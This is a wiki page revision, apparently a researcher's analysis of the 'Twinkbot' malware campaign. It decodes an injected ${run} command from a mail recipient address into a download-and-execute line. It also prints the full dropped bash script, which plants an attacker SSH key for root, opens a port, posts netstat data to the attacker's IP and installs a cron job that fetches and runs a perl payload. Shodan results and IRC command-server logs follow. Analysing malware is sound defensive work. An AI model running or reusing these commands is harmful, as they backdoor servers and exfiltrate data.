Differences between revisions 6 and 7
Revision 6 as of 2020-04-04 07:47:36
Size: 7756
Editor: Sciuro
Comment:
Revision 7 as of 2020-04-04 07:54:02
Size: 7790
Editor: Sciuro
Comment:
Deletions are marked like this. Additions are marked like this.
Line 45: Line 45:
 * https://pastebin.com/kXFkemhf

Origin

<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2045.148.10.84\x2fss\x20-Osxs\x3bchmod\x20\x2bx\x20sxs\x3b.\x2fsxs\x22}}@gnr01.servers.sciuro.org>

\x -> % 

%2Fbin%2Fsh -c %22wget%2045.148.10.84%2fss%20-Osxs%3bchmod%20%2bx%20sxs%3b.%2fsxs%22

URL decode: 

/bin/sh -c "wget 45.148.10.84/ss -Osxs;chmod +x sxs;./sxs"

   1 #!/bin/bash
   2 exists=$(grep -c "^jkl:" /etc/passwd)
   3 if [ $exists -eq 0 ]; then
   4 chattr -isa /root/.ssh/authorized_keys
   5 echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtI3JzaABDotq1IL3m3KCpwMdGCY+Jr5CGbnznw4QPvVh139jplKrTxm7/3bLdfiLXtkmZfQBiWykH1zi0boA4Tdpw2VJAP9cJL7aru3yX6Zp9Ipo8BdwHHx/KCvLeT9zXosdFCGMyrLZySvhLs3ndqcKOLnQiEAwctaMQxH6hyuRo7Ao5xHTQuYHPVLjNQcZ4as2lFmSEHciPaRda7qgOapWXJdFscwiCyfjxoXOvhRLIb9zVuyvYIc+/X3lufaBrr5G7ElnEfV9/82D9GEOfIXXmLpbSmk5jnu66AXPk4KepTzFx3orvQA7Vk84YsWQDxcyiw78nCvICk1S30YtJ root@' >/root/.ssh/authorized_keys
   6 /usr/sbin/sshd -p 322
   7 /sbin/iptables -I OUTPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
   8 /sbin/iptables -I INPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
   9 /sbin/iptables-save >/dev/null 2>&1
  10 /usr/sbin/iptables -I OUTPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
  11 /usr/sbin/iptables -I INPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
  12 /usr/sbin/iptables-save >/dev/null 2>&1
  13 data2=`netstat -natp |grep sshd|base64`
  14 wget -q --post-data "DATA=dGlua2QK&DATA2=$data2" 45.148.10.84/.z/p.php -O /dev/null
  15 cd /tmp
  16 echo 'cd /tmp;wget 45.148.10.84/r.png;perl r.png;rm -fr r.png' > twink
  17 echo 'crontab -l|grep -v twink > /tmp/mycron;crontab /tmp/mycron;rm -fr /tmp/twink' >> twink
  18 echo '* * * * * /tmp/twink' >mycron
  19 crontab -l >> mycron
  20 chmod +x /tmp/twink
  21 crontab mycron;rm -fr mycron
  22 else
  23 exit
  24 fi

IP research

Shodan

    22
    tcp
    ssh
    OpenSSHVersion: 5.3

    SSH-2.0-OpenSSH_5.3
    Key type: ssh-rsa
    Key: AAAAB3NzaC1yc2EAAAABIwAAAQEAvyWZgWstpcVr2blRlY/abtcMf0HAHITFE2ZPjZdu9ikzFFtf
    AgJrdqEX1JoLXvXH+KpE9GYw+4H+J5/qVaBOmMUsCCZmZBdSgI5Va5ZXD2CcZD95JvpbB7w7Zr0Z
    8M32GUPZrrnZY29ZSE0ZeMW6CvcXRH2rU+kEy8cHBaXZjPt6Ng3WXJR1JvVjqPeHQneyOtnw/pGZ
    Yxxwyt8xa9ySoKN0dJOCJBKUhjtXmfH0OLHk9eUQUJ0A5r9F8qCW3JEZcPapfNTITF9rA3f57THC
    +JuoTNxJgS883m/ljcWZJEeWi9IluUMb5ZDDSh+/EVlfhGHOUC6PJ6n8NHE/TrXqwQ==
    Fingerprint: 91:18:7e:69:82:5f:86:6a:ed:a0:1c:c6:38:a7:4a:6c

    Kex Algorithms:
        diffie-hellman-group-exchange-sha256
        diffie-hellman-group-exchange-sha1
        diffie-hellman-group14-sha1
        diffie-hellman-group1-sha1

    Server Host Key Algorithms:
        ssh-rsa
        ssh-dss

    Encryption Algorithms:
        aes128-ctr
        aes192-ctr
        aes256-ctr
        arcfour256
        arcfour128
        aes128-cbc
        3des-cbc
        blowfish-cbc
        cast128-cbc
        aes192-cbc
        aes256-cbc
        arcfour
        rijndael-cbc@lysator.liu.se

    MAC Algorithms:
        hmac-md5
        hmac-sha1
        umac-64@openssh.com
        hmac-sha2-256
        hmac-sha2-512
        hmac-ripemd160
        hmac-ripemd160@openssh.com
        hmac-sha1-96
        hmac-md5-96

    Compression Algorithms:
        none
        zlib@openssh.com

    80
    tcp
    http
     
    Apache httpdVersion: 2.2.15

    HTTP/1.1 403 Forbidden
    Date: Sun, 29 Mar 2020 01:37:10 GMT
    Server: Apache/2.2.15 (CentOS)
    Accept-Ranges: bytes
    Content-Length: 4961
    Connection: close
    Content-Type: text/html; charset=UTF-8

    5432
    tcp
    postgresql
    PostgreSQL

    PostgreSQL
    received invalid response to SSL negotiation: :

    8080
    tcp
    http
    Unreal ircd

    :irc.evilcode.php NOTICE AUTH :*** Looking up your hostname...
    :irc.evilcode.php NOTICE AUTH :*** Found your hostname (cached)
    ERROR :Closing Link: [180.25.78.224] (HTTP command from IRC connection (ATTACK?))

    9999
    tcp
    telnet
    Unreal ircd

    :irc.evilcode.php NOTICE AUTH :*** Looking up your hostname...
    :irc.evilcode.php NOTICE AUTH :*** Found your hostname

Servers

IRCD server

[09:08:24] Connecting to [45.148.10.84] on port 8080
[09:08:24] Connection to host established
[09:08:25] -irc.evilcode.php-   *** Looking up your hostname...
[09:08:25] -irc.evilcode.php-   *** Couldn't resolve your hostname; using your IP address instead
[09:08:25] Welcome to the Don`t Use This ircd IRC Network Guest55!guest55@185.9.18.164
[09:08:25] Your host is irc.evilcode.php, running version Unreal3.2.10.6
[09:08:25] This server was created Sat Mar 7 2020 at 10:20:59 UTC
[09:08:25] irc.evilcode.php Unreal3.2.10.6 iowghraAsORTVSxNCWqBzvdHtGpI lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGjZ
[09:08:25] AWAYLEN=307 CHANLIMIT=#:10 CHANNELLEN=32 CMDS=KNOCK,MAP,DCCALLOW,USERIP,STARTTLS HCN KICKLEN=307 MAXCHANNELS=10 MAXLIST=b:60,e:60,I:60 NAMESX NICKLEN=30 SAFELIST TOPICLEN=307 UHNAMES are supported by this server
[09:08:25] CASEMAPPING=ascii CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTGZ CHANTYPES=# ELIST=MNUCT EXTBAN=~,qjncrRa MAXTARGETS=20 MODES=12 NETWORK=Don`t-Use-This-ircd PREFIX=(qaohv)~&@%+ SILENCE=15 WALLCHOPS WATCH=128 WATCHOPTS=A are supported by this server
[09:08:25] EXCEPTS INVEX STATUSMSG=~&@%+ are supported by this server
[09:08:25] There are 1 users and 9 invisible on 1 servers
[09:08:25] 1 operator(s) online
[09:08:25] 4 channels formed
[09:08:25] I have 10 clients and 0 servers
[09:08:25] Current local users 10, max 232
[09:08:25] Current global users 10, max 232
[09:08:25] Message(422): MOTD File is missing
[09:08:25] Guest55 sets mode +iwx

Only channel #R 

[09:12:07] Guest55 (guest55@2E03481B.742B81C2.C80A0F0D.IP) joined the channel
[09:12:07] Mode is +Mmnstu
[09:12:18] evil has userhost fld@mfu.txt and real name “.”
[09:12:18] evil is in @#R 
[09:12:18] evil is connected on irc.evilcode.php (Stay OUT BITCH!)
[09:12:18] evil is a Network Administrator
[09:12:18] evil is available for help.
[09:12:18] evil signed on at 31 March 2020 at 19:47:43 CEST and has been idle for 13 hours, 11 minutes, 35 seconds

[09:13:49] Connecting to [45.148.10.84] on port 9999
[09:13:49] Connection to host established
[09:13:49] -irc.evilcode.php-   *** Looking up your hostname...
[09:13:49] -irc.evilcode.php-   *** Couldn't resolve your hostname; using your IP address instead
[09:13:49] Welcome to the Don`t Use This ircd IRC Network Guest55!guest55@185.9.18.164
[09:13:49] Your host is irc.evilcode.php, running version Unreal3.2.10.6
[09:13:49] This server was created Sat Mar 7 2020 at 10:20:59 UTC
[09:13:49] irc.evilcode.php Unreal3.2.10.6 iowghraAsORTVSxNCWqBzvdHtGpI lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGjZ
[09:13:49] AWAYLEN=307 CHANLIMIT=#:10 CHANNELLEN=32 CMDS=KNOCK,MAP,DCCALLOW,USERIP,STARTTLS HCN KICKLEN=307 MAXCHANNELS=10 MAXLIST=b:60,e:60,I:60 NAMESX NICKLEN=30 SAFELIST TOPICLEN=307 UHNAMES are supported by this server
[09:13:49] CASEMAPPING=ascii CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTGZ CHANTYPES=# ELIST=MNUCT EXTBAN=~,qjncrRa MAXTARGETS=20 MODES=12 NETWORK=Don`t-Use-This-ircd PREFIX=(qaohv)~&@%+ SILENCE=15 WALLCHOPS WATCH=128 WATCHOPTS=A are supported by this server
[09:13:49] EXCEPTS INVEX STATUSMSG=~&@%+ are supported by this server
[09:13:49] There are 1 users and 9 invisible on 1 servers
[09:13:49] 1 operator(s) online
[09:13:49] 1 unknown connection(s)
[09:13:49] 4 channels formed
[09:13:49] I have 10 clients and 0 servers
[09:13:49] Current local users 10, max 232
[09:13:49] Current global users 10, max 232
[09:13:49] Message(422): MOTD File is missing
[09:13:49] Guest55 sets mode +iwx

Research/2020/Twinkbot (last edited 2020-04-04 16:23:26 by Sciuro)